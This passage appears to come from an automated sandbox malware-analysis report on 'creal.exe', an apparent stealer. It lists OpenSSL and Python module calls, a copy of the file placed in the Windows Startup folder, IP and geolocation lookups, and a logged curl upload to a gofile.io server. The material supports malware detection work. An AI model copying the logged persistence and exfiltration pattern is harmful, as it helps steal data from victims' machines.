            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F8491113 EVP_PKEY_free,ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_MD_CTX_new,ERR_new,ERR_set_debug,EVP_DigestVerifyInit_ex,ERR_new,ERR_set_debug,ERR_new,CRYPTO_free,ERR_new,ERR_set_debug,EVP_MD_CTX_free,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_MD_CTX_free,28_2_00007FF8F8491113
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F8503160 CRYPTO_free,CRYPTO_strndup,28_2_00007FF8F8503160
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F84920EF CRYPTO_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,28_2_00007FF8F84920EF
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F84AF100 ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_free,ERR_new,ERR_set_debug,ERR_set_error,BUF_MEM_free,EVP_MD_CTX_free,X509_free,X509_VERIFY_PARAM_move_peername,CRYPTO_free,28_2_00007FF8F84AF100
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F84FB100 CRYPTO_malloc,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_malloc,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_free,CRYPTO_zalloc,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_free,28_2_00007FF8F84FB100
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F849214E EVP_CIPHER_get_mode,EVP_CIPHER_get_mode,EVP_CIPHER_get_iv_length,EVP_CIPHER_get_key_length,CRYPTO_malloc,ERR_new,ERR_set_debug,28_2_00007FF8F849214E
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F84BF1F0 CRYPTO_zalloc,ERR_new,ERR_set_debug,ERR_set_error,_time64,CRYPTO_THREAD_lock_new,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_free,ERR_new,ERR_set_debug,CRYPTO_new_ex_data,CRYPTO_THREAD_lock_free,ERR_new,ERR_set_debug,CRYPTO_free_ex_data,OPENSSL_cleanse,OPENSSL_cleanse,X509_free,OPENSSL_sk_pop_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_THREAD_lock_free,CRYPTO_clear_free,memcpy,28_2_00007FF8F84BF1F0
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F84B9270 CRYPTO_free,EVP_PKEY_free,CRYPTO_free,28_2_00007FF8F84B9270
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F84D3270 CRYPTO_free,CRYPTO_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,28_2_00007FF8F84D3270
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F8492121 ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_malloc,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_free,CRYPTO_memdup,ERR_new,ERR_set_debug,28_2_00007FF8F8492121
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F8492478 CRYPTO_memcmp,ERR_new,ERR_set_debug,memchr,ERR_new,CRYPTO_free,CRYPTO_free,CRYPTO_strndup,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,28_2_00007FF8F8492478
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F8491F91 CRYPTO_free,CRYPTO_malloc,ERR_new,ERR_set_debug,28_2_00007FF8F8491F91
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F84913A2 memcpy,CRYPTO_THREAD_read_lock,OPENSSL_LH_retrieve,CRYPTO_THREAD_unlock,CRYPTO_THREAD_unlock,28_2_00007FF8F84913A2
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F8491A0F ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_CIPHER_CTX_get0_cipher,EVP_CIPHER_get_flags,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_MD_CTX_get0_md,EVP_MD_get_size,CRYPTO_memcmp,ERR_set_mark,ERR_clear_last_mark,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,CRYPTO_zalloc,ERR_new,ERR_set_debug,ERR_pop_to_mark,ERR_clear_last_mark,ERR_new,ERR_set_debug,EVP_MD_CTX_get0_md,CRYPTO_memcmp,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_new,strncmp,strncmp,strncmp,strncmp,strncmp,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,28_2_00007FF8F8491A0F
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F8494B40 CRYPTO_zalloc,ERR_new,ERR_set_debug,ERR_set_error,28_2_00007FF8F8494B40
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F8492383 CRYPTO_free,CRYPTO_memdup,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,28_2_00007FF8F8492383
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F850AB20 ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_strndup,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_memdup,OPENSSL_cleanse,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,28_2_00007FF8F850AB20
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F8492432 CRYPTO_zalloc,CRYPTO_zalloc,OBJ_nid2sn,EVP_get_digestbyname,CRYPTO_free,CRYPTO_free,ERR_new,ERR_set_debug,ERR_set_error,28_2_00007FF8F8492432
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F8491492 ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_malloc,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_free,CRYPTO_free,28_2_00007FF8F8491492
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F84926C6 ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_free,CRYPTO_strdup,28_2_00007FF8F84926C6
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F8502BC0 CRYPTO_memcmp,28_2_00007FF8F8502BC0
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F8491212 EVP_PKEY_free,EVP_PKEY_free,CRYPTO_free,OPENSSL_sk_pop_free,CRYPTO_free,CRYPTO_clear_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,memset,28_2_00007FF8F8491212
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F84AABB0 CRYPTO_free,CRYPTO_free,OPENSSL_sk_pop_free,CRYPTO_free,28_2_00007FF8F84AABB0
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F84DEBB0 CRYPTO_free,28_2_00007FF8F84DEBB0
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F84F4BB0 BN_num_bits,BN_bn2bin,CRYPTO_free,CRYPTO_strdup,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,28_2_00007FF8F84F4BB0
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F84D8C60 CRYPTO_free,28_2_00007FF8F84D8C60
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F84DEC10 CRYPTO_free,28_2_00007FF8F84DEC10
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F8494C00 CRYPTO_zalloc,ERR_new,ERR_set_debug,ERR_set_error,28_2_00007FF8F8494C00
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F84D2C30 SRP_Calc_u_ex,BN_num_bits,CRYPTO_malloc,ERR_new,ERR_set_debug,BN_bn2bin,BN_clear_free,BN_clear_free,28_2_00007FF8F84D2C30
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F84917DF ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_realloc,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_realloc,ERR_new,ERR_set_debug,ERR_set_error,28_2_00007FF8F84917DF
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F8491CA8 CRYPTO_strdup,CRYPTO_free,28_2_00007FF8F8491CA8
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F84BEC90 CRYPTO_THREAD_write_lock,OPENSSL_LH_retrieve,OPENSSL_LH_delete,CRYPTO_THREAD_unlock,28_2_00007FF8F84BEC90
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F8491154 CRYPTO_free,ERR_new,ERR_set_debug,28_2_00007FF8F8491154
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F84A4D50 CRYPTO_get_ex_new_index,28_2_00007FF8F84A4D50
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F84F0D60 ERR_new,ERR_set_debug,CRYPTO_clear_free,28_2_00007FF8F84F0D60
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F84D8D10 OPENSSL_cleanse,CRYPTO_free,28_2_00007FF8F84D8D10
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F84914CE CRYPTO_free,CRYPTO_free,CRYPTO_memdup,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,28_2_00007FF8F84914CE
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F84917E9 ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_malloc,ERR_new,ERR_set_debug,ERR_new,memcmp,ERR_new,CRYPTO_memdup,ERR_new,ERR_new,ERR_set_debug,28_2_00007FF8F84917E9
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F8491771 CRYPTO_free,28_2_00007FF8F8491771
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F84F6D90 CRYPTO_free,ERR_new,ERR_set_debug,CRYPTO_free,28_2_00007FF8F84F6D90
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F84A4DB0 i2d_X509_NAME,i2d_X509_NAME,memcmp,CRYPTO_free,CRYPTO_free,28_2_00007FF8F84A4DB0
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F84AEE43 CRYPTO_free,28_2_00007FF8F84AEE43
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F84922E8 CRYPTO_malloc,CONF_parse_list,CRYPTO_memdup,CRYPTO_free,CRYPTO_free,28_2_00007FF8F84922E8
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F8491A05 ERR_new,ERR_set_debug,ERR_set_error,ASN1_item_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,memcpy,memcpy,_time64,X509_free,memcpy,CRYPTO_free,ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_free,ASN1_item_free,28_2_00007FF8F8491A05
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F849258B ERR_new,ERR_set_debug,CRYPTO_free,BIO_clear_flags,BIO_set_flags,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,memcpy,OPENSSL_cleanse,28_2_00007FF8F849258B
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F850AED0 ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_malloc,ERR_new,ERR_set_debug,EVP_PKEY_CTX_new_from_pkey,ERR_new,ERR_set_debug,EVP_PKEY_decrypt_init,EVP_PKEY_CTX_set_rsa_padding,OSSL_PARAM_construct_uint,OSSL_PARAM_construct_end,EVP_PKEY_CTX_set_params,EVP_PKEY_decrypt,OPENSSL_cleanse,ERR_new,ERR_new,ERR_new,ERR_set_debug,CRYPTO_free,EVP_PKEY_CTX_free,28_2_00007FF8F850AED0
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F8491370 ERR_new,ERR_set_debug,CRYPTO_THREAD_read_lock,CRYPTO_THREAD_unlock,ERR_new,ERR_set_debug,CRYPTO_THREAD_unlock,CRYPTO_THREAD_unlock,memset,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,28_2_00007FF8F8491370
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F8491460 CRYPTO_malloc,ERR_new,ERR_set_debug,ERR_set_error,BIO_snprintf,28_2_00007FF8F8491460
            Source: unknown HTTPS traffic detected: 31.14.70.245:443 -> 192.168.2.9:49788 version: TLS 1.2
            Source: unknown HTTPS traffic detected: 31.14.70.245:443 -> 192.168.2.9:49801 version: TLS 1.2
            Source: unknown HTTPS traffic detected: 31.14.70.245:443 -> 192.168.2.9:49813 version: TLS 1.2
            Source: unknown HTTPS traffic detected: 31.14.70.245:443 -> 192.168.2.9:49911 version: TLS 1.2
            Source: unknown HTTPS traffic detected: 31.14.70.245:443 -> 192.168.2.9:49921 version: TLS 1.2
            Source: unknown HTTPS traffic detected: 31.14.70.245:443 -> 192.168.2.9:49934 version: TLS 1.2
            Source: creal.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
            Source: Binary string: D:\a\1\b\bin\amd64\python312.pdb source: creal.exe, 00000002.00000002.1584456751.00007FF8E7BD3000.00000002.00000001.01000000.00000004.sdmp
            Source: Binary string: D:\a\1\b\bin\amd64\unicodedata.pdb source: creal.exe, 00000002.00000002.1579097857.00007FF8E712F000.00000002.00000001.01000000.00000019.sdmp
            Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC source: creal.exe, 00000002.00000002.1582537332.00007FF8E7642000.00000002.00000001.01000000.00000011.sdmp
            Source: Binary string: D:\a\1\b\bin\amd64\_overlapped.pdb source: creal.exe, 00000002.00000002.1588731612.00007FF8F7A06000.00000002.00000001.01000000.00000014.sdmp, creal.exe, 0000001A.00000003.1544118293.0000025EFD905000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: creal.exe, 00000000.00000003.1371953608.0000018FDF26A000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000002.00000002.1590369480.00007FF8F8BC3000.00000002.00000001.01000000.00000005.sdmp, creal.exe, 0000001A.00000003.1541448676.0000025EFD905000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: creal.exe, 00000000.00000003.1371953608.0000018FDF26A000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000002.00000002.1590369480.00007FF8F8BC3000.00000002.00000001.01000000.00000005.sdmp, creal.exe, 0000001A.00000003.1541448676.0000025EFD905000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: D:\a\1\b\bin\amd64\sqlite3.pdb source: creal.exe, 00000002.00000002.1574380417.00007FF8E69DC000.00000002.00000001.01000000.0000001B.sdmp
            Source: Binary string: D:\a\1\b\bin\amd64\_multiprocessing.pdb source: creal.exe, 0000001A.00000003.1543955907.0000025EFD905000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140_1.amd64.pdb source: creal.exe, 00000000.00000003.1372232763.0000018FDF26A000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 0000001A.00000003.1541833635.0000025EFD905000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: D:\a\1\b\bin\amd64\select.pdb source: creal.exe, 00000002.00000002.1589596642.00007FF8F8303000.00000002.00000001.01000000.0000000D.sdmp
            Source: Binary string: D:\a\1\b\bin\amd64\_ctypes.pdb source: creal.exe, 00000002.00000002.1589772887.00007FF8F8751000.00000002.00000001.01000000.00000007.sdmp
            Source: Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: creal.exe, 00000002.00000002.1580095250.00007FF8E7177000.00000002.00000001.01000000.00000016.sdmp, creal.exe, 0000001A.00000003.1543399953.0000025EFD905000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: D:\a\1\b\libssl-3.pdbEE source: creal.exe, 00000002.00000002.1580838537.00007FF8E7255000.00000002.00000001.01000000.00000012.sdmp
            Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdbNN source: creal.exe, 00000002.00000002.1587898705.00007FF8E802C000.00000002.00000001.01000000.0000000A.sdmp, creal.exe, 0000001A.00000003.1543628592.0000025EFD905000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: D:\a\1\b\bin\amd64\_asyncio.pdb source: creal.exe, 00000000.00000003.1372380110.0000018FDF26A000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000002.00000002.1587254717.00007FF8E7FA8000.00000002.00000001.01000000.00000013.sdmp, creal.exe, 0000001A.00000003.1542028020.0000025EFD905000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: D:\a\1\b\bin\amd64\_uuid.pdb source: creal.exe, 00000002.00000002.1574615880.00007FF8E6EF2000.00000002.00000001.01000000.0000002D.sdmp, creal.exe, 0000001A.00000003.1545277030.0000025EFD905000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: D:\a\1\b\bin\amd64\pyexpat.pdb source: creal.exe, 00000002.00000002.1580428919.00007FF8E71B2000.00000002.00000001.01000000.00000015.sdmp
            Source: Binary string: D:\a\1\b\bin\amd64\_queue.pdb source: creal.exe, 00000002.00000002.1589350978.00007FF8F7EC3000.00000002.00000001.01000000.0000000E.sdmp, creal.exe, 0000001A.00000003.1544286288.0000025EFD905000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: creal.exe, 00000002.00000002.1587898705.00007FF8E802C000.00000002.00000001.01000000.0000000A.sdmp, creal.exe, 0000001A.00000003.1543628592.0000025EFD905000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: creal.exe, 00000000.00000003.1372510190.0000018FDF26A000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000002.00000002.1589012234.00007FF8F7A9D000.00000002.00000001.01000000.00000009.sdmp, creal.exe, 0000001A.00000003.1542237696.0000025EFD905000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: D:\a\1\b\bin\amd64\_wmi.pdb source: creal.exe, 00000002.00000002.1590664825.00007FF8F8D84000.00000002.00000001.01000000.0000000B.sdmp, creal.exe, 0000001A.00000003.1545461593.0000025EFD905000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: D:\a\1\b\bin\amd64\_socket.pdb source: creal.exe, 00000002.00000002.1587570318.00007FF8E7FF9000.00000002.00000001.01000000.0000000C.sdmp
            Source: Binary string: D:\a\1\b\bin\amd64\_sqlite3.pdb source: creal.exe, 00000002.00000002.1578860238.00007FF8E700F000.00000002.00000001.01000000.0000001A.sdmp
            Source: Binary string: D:\a\1\b\bin\amd64\_wmi.pdb''&GCTL source: creal.exe, 00000002.00000002.1590664825.00007FF8F8D84000.00000002.00000001.01000000.0000000B.sdmp, creal.exe, 0000001A.00000003.1545461593.0000025EFD905000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: D:\a\1\b\bin\amd64\python3.pdb source: creal.exe, 00000002.00000002.1555010440.00000185BB290000.00000002.00000001.01000000.00000006.sdmp
            Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140_1.amd64.pdbGCTL source: creal.exe, 00000000.00000003.1372232763.0000018FDF26A000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 0000001A.00000003.1541833635.0000025EFD905000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: D:\a\1\b\libssl-3.pdb source: creal.exe, 00000002.00000002.1580838537.00007FF8E7255000.00000002.00000001.01000000.00000012.sdmp
            Source: Binary string: D:\a\1\b\bin\amd64\_ssl.pdb source: creal.exe, 00000002.00000002.1583452111.00007FF8E77AD000.00000002.00000001.01000000.00000010.sdmp
            Source: C:\Users\user\Desktop\creal.exe | Code function: 0_2_00007FF67A608B00 FindFirstFileExW,FindClose,0_2_00007FF67A608B00
            Source: C:\Users\user\Desktop\creal.exe | Code function: 0_2_00007FF67A617F4C _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError,0_2_00007FF67A617F4C
            Source: C:\Users\user\Desktop\creal.exe | Code function: 0_2_00007FF67A621FE4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00007FF67A621FE4
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe | Code function: 26_2_00007FF7C3CE8B00 FindFirstFileExW,FindClose,26_2_00007FF7C3CE8B00
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe | Code function: 26_2_00007FF7C3CF7F4C _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError,26_2_00007FF7C3CF7F4C
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe | Code function: 26_2_00007FF7C3D01FE4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,26_2_00007FF7C3D01FE4
            Source: C:\Windows\System32\cmd.exe | File opened: C:\Users\user\AppData\Roaming\
            Source: C:\Windows\System32\cmd.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\
            Source: C:\Windows\System32\cmd.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\
            Source: C:\Windows\System32\cmd.exe | File opened: C:\Users\user\AppData\
            Source: C:\Windows\System32\cmd.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\
            Source: C:\Windows\System32\cmd.exe | File opened: C:\Users\user\
            Source: Joe Sandbox View | IP Address: 45.112.123.126 45.112.123.126
            Source: Joe Sandbox View | IP Address: 104.26.13.205 104.26.13.205
            Source: Joe Sandbox View | IP Address: 159.89.102.253 159.89.102.253
            Source: Joe Sandbox View | JA3 fingerprint: 74954a0c86284d0d6e1c4efefe92b521
            Source: unknown | DNS query: name: api.ipify.org
            Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe | Code function: 28_2_00007FF8F8463E40 PyExc_ValueError,PyErr_SetString,PyEval_SaveThread,WSARecvFrom,PyEval_RestoreThread,#111,SetEvent,_Py_NoneStruct,28_2_00007FF8F8463E40
            Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | Accept-Encoding: identity | Host: api.ipify.org | User-Agent: Python-urllib/3.12 | Connection: close
            Source: global traffic | HTTP traffic detected: GET /getServer HTTP/1.1 | Accept-Encoding: identity | Host: api.gofile.io | User-Agent: Python-urllib/3.12 | Connection: close
            Source: global traffic | HTTP traffic detected: GET /jsonp/8.46.123.189 HTTP/1.1 | Accept-Encoding: identity | Host: geolocation-db.com | User-Agent: Python-urllib/3.12 | Connection: close
            Source: global traffic | DNS traffic detected: DNS query: api.ipify.org
            Source: global traffic | DNS traffic detected: DNS query: api.gofile.io
            Source: global traffic | DNS traffic detected: DNS query: geolocation-db.com
            Source: global traffic | DNS traffic detected: DNS query: store4.gofile.io
            Source: unknown | HTTP traffic detected: POST /uploadFile HTTP/1.1 | Host: store4.gofile.io | User-Agent: curl/7.83.1 | Accept: */* | Content-Length: 193 | Content-Type: multipart/form-data; boundary=------------------------069d07de67658548
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.27.1 | Date: Thu, 16 Jan 2025 08:09:17 GMT | Content-Type: text/html; charset=utf-8 | Content-Length: 14 | Connection: close | Access-Control-Allow-Origin: * | Access-Control-Allow-Headers: Content-Type, Authorization | Access-Control-Allow-Methods: GET, POST, OPTIONS, PUT, DELETE, HEAD | Access-Control-Allow-Credentials: true | Content-Security-Policy: default-src 'self';base-uri 'self';font-src 'self' https: data:;form-action 'self';frame-ancestors 'self';img-src 'self' data:;object-src 'none';script-src 'self';script-src-attr 'none';style-src 'self' https: 'unsafe-inline';upgrade-insecure-requests | Cross-Origin-Embedder-Policy: require-corp | Cross-Origin-Opener-Policy: same-origin | Cross-Origin-Resource-Policy: cross-origin | Origin-Agent-Cluster: ?1 | Referrer-Policy: no-referrer | Strict-Transport-Security: max-age=15552000; includeSubDomains | X-Content-Type-Options: nosniff | X-DNS-Prefetch-Control: off | X-Download-Options: noopen | X-Frame-Options: SAMEORIGIN | X-Permitted-Cross-Domain-Policies: none | X-XSS-Protection: 0 | ETag: W/"e-18wLxDNka2j9cTg7gpgujtuBb1A" | X-Robots-Tag: noindex, nofollow
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.27.1 | Date: Thu, 16 Jan 2025 08:09:35 GMT | Content-Type: text/html; charset=utf-8 | Content-Length: 14 | Connection: close | Access-Control-Allow-Origin: * | Access-Control-Allow-Headers: Content-Type, Authorization | Access-Control-Allow-Methods: GET, POST, OPTIONS, PUT, DELETE, HEAD | Access-Control-Allow-Credentials: true | Content-Security-Policy: default-src 'self';base-uri 'self';font-src 'self' https: data:;form-action 'self';frame-ancestors 'self';img-src 'self' data:;object-src 'none';script-src 'self';script-src-attr 'none';style-src 'self' https: 'unsafe-inline';upgrade-insecure-requests | Cross-Origin-Embedder-Policy: require-corp | Cross-Origin-Opener-Policy: same-origin | Cross-Origin-Resource-Policy: cross-origin | Origin-Agent-Cluster: ?1 | Referrer-Policy: no-referrer | 